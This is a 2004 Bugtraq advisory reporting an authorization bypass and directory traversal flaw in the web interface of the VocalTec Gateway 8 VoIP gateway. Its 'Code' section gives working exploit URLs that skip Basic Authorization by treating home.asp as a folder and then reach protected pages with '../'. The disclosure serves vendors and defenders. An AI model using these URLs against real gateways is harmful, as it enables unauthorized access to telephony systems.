VocalTec Gateway 8 Reverse Directory Transversal + Authorization Bypass

To: "bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: VocalTec Gateway 8 Reverse Directory Transversal + Authorization Bypass
From: "Rafel Ivgi, The-Insider" <theinsider@xxxxxxxxxx>
Date: Mon, 15 Mar 2004 09:33:31 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: "Rafel Ivgi, The-Insider" <theinsider@xxxxxxxxxx>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application                  VocalTec Gateway
Vendors:                      http://www.vocaltec.com
Versions:                     8
Platforms:                    Windows
Bug:                              Reverse Directory Transversal +
Authorization Bypass
Risk:                             High
Exploitation:                 Remote with browser
Date:                            14 Mar 2004
Author:                          Rafel Ivgi, The-Insider
e-mail:                           the_insider@xxxxxxxx
web:                              http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

It provides high voice quality and optimized packet voice streaming over
managed and public
(Internet) IP networks. Utilizing a robust, outdoor embedded platform,
VGW4/8 ensures enhanced
reliability and high performance.

VGW4/8 enables users to make local, long distance and international
telephone/fax calls using
existing telephony devices. Calls originating or terminating at a VGW4/8 may
be routed through
a carrier providing a VoIP Virtual Private Network service or over existing
corporate IP data networks.

Product details: http://www.vocaltec.com/html/telephony/gateway_4_8.shtml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======


Upon connecting to the server a "Basic Authorization" login is required.
If it failes there is information disclosure :

-------------------------------------------------------------
Access Error: Unauthorized
when trying to obtain /home.asp

Access to this document requires a User ID
-------------------------------------------------------------

Accessing the given file name again requests a "Basic Authorization" login.
By reffering to the file as a folder the authorization is bypassed.
For Example:
http://<host>/home.asp/

Now after we have bypassed the authorization we can use Reverse Directory
Transversal to
access any "Basic Authorization" protected file.
For Example:
http://<host>/home.asp/../menu.asp

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

http://<host>/home.asp/
http://<host>/home.asp/../menu.asp

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Follow-Ups:
- spamblocker turns into mail denial of service
  - From: Dana Hudes

Prev by Date: Re: Multiple Vulnerabilities in PWS 0.2.2
Next by Date: ws_ftp overflow
Previous by thread: [SCAN Associates Sdn Bhd Security Advisory] phpBB 2.0.6 and below sql injection
Next by thread: spamblocker turns into mail denial of service
Index(es):
- Date
- Thread